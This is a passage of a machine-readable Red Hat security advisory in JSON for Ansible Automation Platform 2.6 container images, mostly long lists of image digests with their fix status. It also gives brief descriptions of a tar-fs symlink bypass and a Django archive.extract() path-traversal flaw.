"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "tar-fs: tar-fs symlink validation bypass"
},
{
"cve": "CVE-2025-59682",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-09-30T13:18:31.746000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400450"
}
],
"notes": [
{
"category": "description",
"text": "An issue was discovered in Django 4.2 before 4.2.25, 5.1 before 5.1.13, and 5.2 before 5.2.7. The django.utils.archive.extract() function, used by the \"startapp --template\" and \"startproject --template\" commands, allows partial directory traversal via an archive with file paths sharing a common prefix with the target directory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "django: Potential partial directory-traversal via archive.extract()",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
